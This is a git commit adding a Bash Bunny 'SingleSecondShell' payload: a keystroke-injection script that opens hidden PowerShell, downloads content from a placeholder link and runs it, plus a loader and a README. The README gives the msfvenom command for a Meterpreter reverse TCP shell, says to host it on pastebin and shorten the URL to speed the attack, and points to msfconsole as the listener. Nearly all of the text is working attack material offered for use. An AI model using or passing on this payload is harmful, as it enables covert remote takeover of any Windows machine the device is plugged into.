Added SingleSecondShell payload (#115)

* Add files via upload

* Update readme.md
pull/100/merge
0xCoto 2017-04-07 08:45:09 +03:00 committed by Sebastian Kinne
parent 34003917ee
commit 741b4a67e5
3 changed files with 63 additions and 0 deletions

View File

@ -0,0 +1,6 @@
DELAY 2000
GUI r
DELAY 200
STRING powershell -windowstyle hidden $u='YOUR_LINK';$r=Invoke-WebRequest -Uri $u;powershell -nop -e $r.content
DELAY 100
ENTER

View File

@ -0,0 +1,18 @@
LED G
ATTACKMODE HID STORAGE
# Set your language here
LANGUAGE='us'
LED R G
# Check for switch position to make it easier for us.
source bunny_helpers.sh
if [ -f "/root/udisk/payloads/${SWITCH_POSITION}/ducky_script.txt" ]; then
QUACK ${SWITCH_POSITION}/ducky_script.txt
LED G
else
LED R
echo "Unable to load ducky_script.txt" >> /root/debuglog.txt
exit 1
fi

View File

@ -0,0 +1,39 @@
# SingleSecondShell
Author: [@0xCoto](https://github.com/0xCoto)
Version: Version 1.0
## Description
Plug in the bash bunny, get a shell. Instantly.
The <1 Second ReverseShell Payload is going to run blazing fast on the Bash Bunny, and cannot work on any other BadUSB devices, such as the USB Rubber Ducky that quick. That is obviously the reason this Payload is dedicated and specifically developed for the Bash Bunny. Plug in, and before you know it, you've got a shell. How awesome is that?
## Configuration
#### Generating Payload
In order to generate your reverse_tcp Payload, you need to run the following command on your Kali machine (unless you have msfvenom installed on another OS): ```msfvenom -p windows/meterpreter/reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f psh-cmd smallest```
Make sure to replace `YOUR_IP` with your local/public IP Address (depending on the type of attack you are looking to perform) and `YOUR_PORT` with the port that you've forwarded (if you are performing a public attack, outside your network).
When the payload is generated, remove everything up to `powershell.exe` and upload it to pastebin. Here's my example: http://pastebin.com/raw/DJbS5mTj
#### Shortening the URL
As you can see, we have a pretty long URL. So, in order to shorten the URL and reduce the amount of keystrokes, therefore attacking time, we are going to be using a URL shortening service, such as https://goo.gl/.
#### Completeing the script
That's it. Now just replace the `$u='YOUR_LINK'` with your new URL. For example: `$u='goo.gl/8ggZD1'`
Note: You do not need to include `http(s)://` in your URL, so you can go ahead and get rid of that too to reduce keystrokes and speedup the keystroke injection.
## Listening to Connections
Listening to connections is pretty straightforward, but I'm not going to cover it in detail in this tutorial. All you need to do is use a listener software, CLI or GUI, such as `msfconsole` or `Armitage`, both of which can be setup to work with each other very easily.
## Bash Bunny Status
| LED | Status |
| ---------------- | ------------------------------------- |
| Red | Failed to open script file |
| Amber | Script Running |
| Green | Finished |